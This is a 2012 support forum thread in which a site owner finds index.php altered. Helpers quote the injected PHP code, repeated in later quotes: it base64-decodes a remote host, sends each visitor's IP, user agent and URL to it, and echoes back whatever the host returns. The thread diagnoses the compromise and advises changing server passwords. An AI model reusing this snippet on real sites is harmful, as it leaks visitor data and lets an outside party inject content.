Topic: error 452 in file index.php (Read 6209 times)

tortech · « **on:** November 29, 2012, 01:43:02 pm »

Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php

Αndré · « **Reply #1 on:** November 29, 2012, 02:14:08 pm »

Have a look at that line:

Code: [Select]

        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to

Code: [Select]

        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

Quote from: tortech on November 29, 2012, 01:43:02 pm

change atrib 755 to 644 for file named index.php

I doubt that this will change anything.

tortech · « **Reply #2 on:** November 29, 2012, 03:12:05 pm »

Thank you for answer and solve a problem.

Quote from: Αndré on November 29, 2012, 02:14:08 pm

Have a look at that line:
Code: [Select]
$cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
$cat['details']['description'] = preg_replace("/<br.*?><?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

tortech · « **Reply #3 on:** December 02, 2012, 12:56:24 pm »

What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?

Quote from: Αndré on November 29, 2012, 02:14:08 pm

Have a look at that line:
Code: [Select]
$cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
$cat['details']['description'] = preg_replace("/<br.*?><?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

Αndré · « **Reply #4 on:** December 03, 2012, 10:51:14 am »

I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).

Veronica · « **Reply #5 on:** December 03, 2012, 11:08:15 am »

This is a Wordpress hack described in detail here
http://www.jexanalytics.com/2012/02/wordpress-sites-all-hacked/

Αndré · « **Reply #6 on:** December 03, 2012, 11:30:19 am »

As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.

News:

Author Topic: error 452 in file index.php (Read 6209 times)

tortech

error 452 in file index.php

Αndré

Re: error 452 in file index.php

tortech

Re: Re: error 452 in file index.php

tortech

Re: Re: error 452 in file index.php

Αndré

Re: error 452 in file index.php

Veronica

Re: error 452 in file index.php

Αndré

Re: error 452 in file index.php